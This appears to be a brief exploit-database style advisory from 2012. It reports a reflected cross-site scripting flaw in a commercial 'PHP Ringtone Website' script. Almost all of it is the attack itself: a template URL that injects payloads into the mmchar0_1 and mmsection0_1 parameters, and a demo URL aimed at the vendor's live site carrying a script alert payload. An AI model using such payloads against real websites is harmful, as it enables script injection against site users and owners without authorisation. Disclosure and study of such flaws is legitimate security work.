############################################################################
#
# Exploit Title: PHP Ringtone Website
# Date: 14/01/2012
# Author: Atmon3r
# Discovered By: Atmon3r
# Software Link: http://www.e-soft24.com/php-ringtone-website-p-351.html
# Version: All Version
# Security Risk:: Low
# Tested on: GNU/Linux Ubuntu
#
############################################################################
#
#  Exploit:
#  
http://www.website.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss]
#
############################################################################
#
#  Demo:
#  
http://www.e-soft24.com/ringtones/ringtones.php?mmchar0_1=G/"><script>alert('Xss 
By Atm0n3r')</script>&mmstart0_1=1&mmsection0_1=/"><script>alert('Xss By 
Atm0n3r')</script>
#
############################################################################